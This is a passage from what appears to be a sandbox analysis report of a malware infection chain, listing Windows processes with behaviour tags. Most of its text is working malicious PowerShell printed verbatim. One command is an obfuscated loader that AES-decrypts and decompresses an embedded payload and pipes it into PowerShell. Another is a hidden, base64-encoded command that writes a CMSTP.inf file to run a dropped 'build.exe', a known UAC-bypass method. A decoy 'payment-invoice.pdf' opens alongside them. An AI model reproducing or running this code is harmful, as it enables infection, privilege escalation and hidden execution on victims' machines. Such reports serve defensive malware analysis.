Wjc4NjEDyB7YdKrxWWLfHajJN5k1KV5X7nq64fJUxAPGkK3JxZDpSrg5T4NZXScGtbmDu+lBqF4tzKfQjnHIST38dvKSxFHOTRmUSAMT05UsRGpTOwBhONpn4Hdb19KYK/NFo6suYNi3P/9VQqLDlky1OKiCWD8VgWxt6E/oCB514uoeM+WzNDwYz5AoDEtSMGONpLAzbyR65kxfC/lVIMVX5nCcg1Oc0M9XpizaS2lIxtkF6Pv0Y+rz+we0VEBD82MwM3BbKJACq8aFH7yXsbA==';$qLhHyMkmn = 'UkR6aHh0dFNTVGdzdVlPd2pWc3d3U21hY09yaUtzSEU=';$SrCYeqlEMybRg = New-Object 'System.Security.Cryptography.AesManaged';$SrCYeqlEMybRg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$SrCYeqlEMybRg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$SrCYeqlEMybRg.BlockSize = 128;$SrCYeqlEMybRg.KeySize = 256;$SrCYeqlEMybRg.Key = [System.Convert]::FromBase64String($qLhHyMkmn);$xxyJt = [System.Convert]::FromBase64String($omHMoANH);$LhzQiNebtVuDjBpJ = $xxyJt[0..15];$SrCYeqlEMybRg.IV = $LhzQiNebtVuDjBpJ;$VoLaJfGGVKwWHb = $SrCYeqlEMybRg.CreateDecryptor();$CmpJAAIieWIMY = $VoLaJfGGVKwWHb.TransformFinalBlock($xxyJt, 16, $xxyJt.Length - 16);$SrCYeqlEMybRg.Dispose();$ITRSHNZAoB = New-Object System.IO.MemoryStream( , $CmpJAAIieWIMY );$mJoRxGkyAPH = New-Object System.IO.MemoryStream;$WIUvowurKQrWfasvYQ = New-Object System.IO.Compression.GzipStream $ITRSHNZAoB, ([IO.Compression.CompressionMode]::Decompress);$WIUvowurKQrWfasvYQ.CopyTo( $mJoRxGkyAPH );$WIUvowurKQrWfasvYQ.Close();$ITRSHNZAoB.Close();[byte[]] $ZMksVyn = $mJoRxGkyAPH.ToArray();$VZPnG = [System.Text.Encoding]::UTF8.GetString($ZMksVyn);$VZPnG | powershell -
5⤵
- Suspicious use of WriteProcessMemory
PID:2376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $omHMoANH = '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';$qLhHyMkmn = 'UkR6aHh0dFNTVGdzdVlPd2pWc3d3U21hY09yaUtzSEU=';$SrCYeqlEMybRg = New-Object 'System.Security.Cryptography.AesManaged';$SrCYeqlEMybRg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$SrCYeqlEMybRg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$SrCYeqlEMybRg.BlockSize = 128;$SrCYeqlEMybRg.KeySize = 256;$SrCYeqlEMybRg.Key = [System.Convert]::FromBase64String($qLhHyMkmn);$xxyJt = [System.Convert]::FromBase64String($omHMoANH);$LhzQiNebtVuDjBpJ = $xxyJt[0..15];$SrCYeqlEMybRg.IV = $LhzQiNebtVuDjBpJ;$VoLaJfGGVKwWHb = $SrCYeqlEMybRg.CreateDecryptor();$CmpJAAIieWIMY = $VoLaJfGGVKwWHb.TransformFinalBlock($xxyJt, 16, $xxyJt.Length - 16);$SrCYeqlEMybRg.Dispose();$ITRSHNZAoB = New-Object System.IO.MemoryStream( , $CmpJAAIieWIMY );$mJoRxGkyAPH = New-Object System.IO.MemoryStream;$WIUvowurKQrWfasvYQ = New-Object System.IO.Compression.GzipStream $ITRSHNZAoB, ([IO.Compression.CompressionMode]::Decompress);$WIUvowurKQrWfasvYQ.CopyTo( $mJoRxGkyAPH );$WIUvowurKQrWfasvYQ.Close();$ITRSHNZAoB.Close();[byte[]] $ZMksVyn = $mJoRxGkyAPH.ToArray();$VZPnG = [System.Text.Encoding]::UTF8.GetString($ZMksVyn);$VZPnG
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -
6⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3084

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\payment-invoice.pdf"
7⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:756

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
8⤵
- Suspicious use of WriteProcessMemory
PID:5100

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1781DCCE2A32FEFAB0F302CAB6289536 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
9⤵
PID:4816

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4D32FA7F18FB4633CB474265D43F4025 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4D32FA7F18FB4633CB474265D43F4025 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
9⤵
PID:4100

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=463BEA75364FD4FB1EF7684BA97D0AEC --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=463BEA75364FD4FB1EF7684BA97D0AEC --renderer-client-id=4 --mojo-platform-channel-handle=2192 --allow-no-sandbox-job /prefetch:1
9⤵
PID:3704

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1C961195BC9B63B761CE61913BAA3EEC --mojo-platform-channel-handle=2568 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
9⤵
PID:3688

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=27B00C5A6A7CBFC7FDD8BFF39C435877 --mojo-platform-channel-handle=2808 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
9⤵
PID:3692

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7D06BC0533B0D1653D239E6B11F837AD --mojo-platform-channel-handle=2972 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
9⤵
PID:4064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0ATgBhAG0AZQAgAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAFcAUABJAEEAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACcADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUABvAHMAdABNAGUAcwBzAGEAZwBlACgAaQBuAHQAIABoAFcAbgBkACwAIAB1AGkAbgB0ACAATQBzAGcALAAgAGkAbgB0ACAAdwBQAGEAcgBhAG0ALAAgAGkAbgB0ACAAbABQAGEAcgBhAG0AKQA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbwBuAHMAdAAgAGkAbgB0ACAAVwBNAF8AQwBIAEEAUgAgAD0AIAAwAHgAMAAxADAAMAA7AA0ACgAnAEAADQAKAEYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGkAcAB0ADoAUwBlAHQALQBJAE4ARgBGAGkAbABlACAAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACAAKAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACAAPQAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABDAE0AUwBUAFAALgBpAG4AZgAiACwAWwBTAHQAcgBpAG4AZwBdACQAQwBvAG0AbQBhAG4AZABUAG8ARQB4AGUAYwB1AHQAZQAgAD0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAYgB1AGkAbABkAC4AZQB4AGUAIAAnACkAJABJAG4AZgBDAG8AbgB0AGUAbgB0AD0AQAAiAA0ACgBbAHYAZQByAHMAaQBvAG4AXQANAAoAUwBpAGcAbgBhAHQAdQByAGUAIAA9AGAAJABjAGgAaQBjAGEAZwBvAGAAJAANAAoAQQBkAHYAYQBuAGMAZQBkAEkATgBGACAAPQAgADIALgA1AA0ACgBbAEQAZQBmAGEAdQBsAHQASQBuAHMAdABhAGwAbABdAA0ACgBDAHUAcwB0AG8AbQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAA9ACAAQwB1AHMAdABJAG4AcwB0AEQAZQBzAHQAUwBlAGMAdABpAG8AbgBBAGwAbABVAHMAZQByAHMADQAKAFIAdQBuAFAAcgBlAFMAZQB0AHUAcABDAG8AbQBtAGEAbgBkAHMAIAA9ACAAUgB1AG4AUAByAGUAUwBlAHQAdQBwAEMAbwBtAG0AYQBuAGQAcwBTAGUAYwB0AGkAbwBuAA0ACgBbAFIAdQBuAFAAcgBlAFMAZQB0AHUAcABDAG8AbQBtAGEAbgBkAHMAUwBlAGMAdABpAG8AbgBdAA0ACgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAJABDAG8AbQBtAGEAbgBkAFQAbwBFAHgAZQBjAHUAdABlAA0ACgB0AGEAcwBrAGsAaQBsAGwAIAAvAEkATQAgAGMAbQBzAHQAcAAuAGUAeABlACAALwBGAA0ACgBbAEMAdQBzAHQASQBuAHMAdABEAGUAcwB0AFMAZQBjAHQAaQBvAG4AQQBsAGwAVQBzAGUAcgBzAF0ADQAKADQAOQAwADAAMAAsADQAOQAwADAAMQA9AEEAbABsAFUAUwBlAHIAXwBMAEQASQBEAFMAZQBjAHQAaQBvAG4ALAAgADcADQAKAFsAQQBsAGwAVQBTAGUAcgBfAEwARABJAEQAUwBlAGMAdABpAG8AbgBdAA0ACgAiAEgASwBMAE0AIgAsACAAIgBTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcAAgAFAAYQB0AGgAcwBcAEMATQBNAEcAUgAzADIALgBFAFgARQAiACwAIAAiAFAAcgBvAGYAaQBsAGUASQBuAHMAdABhAGwAbABQAGEAdABoACIALAAgACIAJQBVAG4AZQB4AHAAZQBjAHQAZQBkAEUAcgByAG8AcgAlACIALAAgACIAIgANAAoAWwBTAHQAcgBpAG4AZwBzAF0ADQAKAFMAZQByAHYAaQBjAGUATgBhAG0AZQA9ACIATgBvAHQAZQBwAGEAZAAiAA0ACgBTAGgAbwByAHQAUwB2AGMATgBhAG0AZQA9ACIATgBvAHQAZQBwAGEAZAAiAA0ACgAiAEAAOwAkAEkAbgBmAEMAbwBuAHQAZQBuAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAAJABJAG4AZgBGAGkAbABlAEwAbwBjAGEAdABpAG8AbgAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQQBTAEMASQBJAH0ARgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBIAHcAbgBkAHsAWwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAKQBdAFAAYQByAGEAbQAoAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAVAByAHUAZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAPQAkAFQAcgB1AGUAKQBdAFsAcwB0AHIAaQBuAGcAXQAkAFAAcgBvAGMAZQBzAHMATgBhAG0AZQApAFAAcgBvAGMAZQBzAHMAewAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJwBTAHQAbwBwACcAOwBUAHIAeQB7ACQAaAB3AG4AZAAgAD0AIABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIAAkAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABNAGEAaQBuAFcAaQBuAGQAbwB3AEgAYQBuAGQAbABlADsAfQBDAGEAdABjAGgAewAkAGgAdwBuAGQAPQAkAG4AdQBsAGwAOwB9ACQAaABhAHMAaAA9AEAAewBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAPQAkAFAAcgBvAGMAZQBzAHMATgBhAG0AZQA7AEgAdwBuAGQAPQAkAGgAdwBuAGQAOwB9ADsATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUABzAE8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIAAkAGgAYQBzAGgAfQB9AGYAdQBuAGMAdABpAG8AbgAgAFMAZQB0AC0AVwBpAG4AZABvAHcAQQBjAHQAaQB2AGUAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACgAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJABUAHIAdQBlACwAVgBhAGwAdQBlAEYAcgBvAG0AUABpAHAAZQBsAGkAbgBlAEIAeQBQAHIAbwBwAGUAcgB0AHkATgBhAG0AZQA9ACQAVAByAHUAZQApAF0AWwBzAHQAcgBpAG4AZwBdACQATgBhAG0AZQApAFAAcgBvAGM